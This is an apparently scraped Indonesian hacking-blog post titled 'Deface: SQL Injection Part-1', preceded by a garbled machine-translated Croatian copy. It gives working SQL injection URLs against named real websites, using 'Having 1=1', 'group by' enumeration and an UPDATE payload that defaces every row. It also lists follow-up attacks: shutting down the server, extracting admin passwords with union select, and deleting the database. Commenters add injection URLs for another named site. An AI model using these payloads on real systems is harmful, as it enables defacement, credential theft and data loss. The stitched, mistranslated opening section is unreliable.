Professional Documents
Culture Documents
Indonesia
http://www.id.wikipedia.org/detil_newsevent.asp?id=06111010
2137 'update td_newsevent postaviti OPIS = "
'; --
Kok LW gak pake naredbu gdje sam? Opa ja sam lijen za to,
iako svima lagian OPIS colum u tablici td_newsevent
sudjelovati ter_Update sve Hehe33x!
Sada je hasilnye ....: Gramedia knjižara najpopularnijih
SE-Indonesia ukaza imate site koji se može precizirao jako
jako ugroženi od haker napada čak i neiskusan jarić tko ga
je bogata Što ja mogu !!!!>>- A samo da možemo laku'in od
TIDAAAAKKK! Što može biti više:
- Dodavanje sadržaja database_Nya .... Na 'Insert
- SQL Server ... smrt. Pake naredbu; shutdown
- Potražite korisničko ime admin password ... n za Uniju
odaberite pretvoriti ATO
- Član traže n korisničko ime lozinka
- Nejasnim što svibanj biti jedan stranicu Nge_Remote
- Mendelete baze podataka
- Mnogo više dahhhh Cape neyy malem dah
1.
joe kaže:
mas ..
To može stvoriti testiranje?
http://www.gianyartourism.com/id.news.asp?lihat=detail&id=N
77668670
http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id
=A98435693 '
http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id
=A98435693 'Having1 = 1 --
http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id
=A98435693 'Grupiraj po id_keg'. A98435693 '--
Kalo sudah siap, saatnya dicoba, berikut ini hanya sebatas TRY alias latihan (memang sih
cara kuno tapi cukup ampuh buah belajar). Latihan ini di ambil dari VIROLOG.info ,
silahkan dicoba, Maaf jika sudah kadaluarso.
buat nyari error gw tambahin tanda kutip satu dielakang jadinya kaya gini:
http://www.id.wikipedia.org/detil_newsevent.asp?id=061110102137‘
wahhh ada, errornya!!! inject ahh buat nyari nama tabel n colomnya pake perintah
‘Having 1=1–
http://www.id.wikipedia.org/detil_newsevent.asp?id=061110102137‘Having 1=1–
kluar error deh :
wahh udaeh dapet nama tabel n kolum pertamanya “td_newsevent nama tabel n
NEWSEVENT_ID nama kolum” terusin ahh!!!
untuk tau kolum berikutnya gw pake perintah
‘Group+by+kolum_name(NEWSEVENT_ID)
http://www.id.wikipedia.org/detil_newsevent.asp?id=061110102137%20‘group%20by%
20td_newsevent.NEWSEVENT_ID–
Error_Nya :
http://www.id.wikipedia.org/detil_newsevent.asp?id=061110102137%20‘update+td_new
sevent+set+DESCRIPTION=”
<”font%20color=red><”marquee>4L13N%20FOUND%20BUG%20PLEASE%20PATC
H%20YOUR%20SYSTEM
‘;–
Kok lw gak pake perintah where sich??? Wah Gw terlalu malas untuk itu, lagian biar
semua colum DESCRIPTION yang ada di tabel td_newsevent ikut ter_Update semuanya
Hehe33x!!
Nah ini dia hasilnye….:Gramedia toko buku paling populer se-Indonesia ternyata
mempunyai situs yang bisa dibilang amat sangat rentan dari serangan hacker bahkan
bocah ingusan yang ga’ tau apa-apa kaya gw juga bisa!!!!>>-A Apa cuma itu yang bisa
kita laku’in tentu TIDAAAAKKK!!!! kalo ditelusuri lagi kita bisa :
- Menambahkan isi database_Nya….pake perintah ‘Insert
- mematikan Sql server….pake perintah ;shutdown
- mencari username admin n passwordnya… pake perintah union+select ato convert
- mencari username member n passwordnya
- deface satu halaman ato mungkin Nge_Remote
- mendelete database
- masih banyak lagi dahhhh cape neyy dah malem
This entry was posted on Nopember 1, 2007 at 8:08 am and is filed under Hacking-
Cracking-Carding dan Sejenisnya. You can subscribe via RSS 2.0 feed to this post's
comments. You can comment below, or link to this permanent URL from your own site.
5 Comments on “Deface: SQL Injection Part-1”
1.
joe Says:
http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id=A98435693‘Having1
=1-
http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id=A98435693‘Group%
20by%20id_keg.’A98435693′-
Dst…. :-) :-) Nanti saya ndak keterusan mas. Di coba sendiri saja. Monggo
Balas
2.
Singgih Kumoro Says: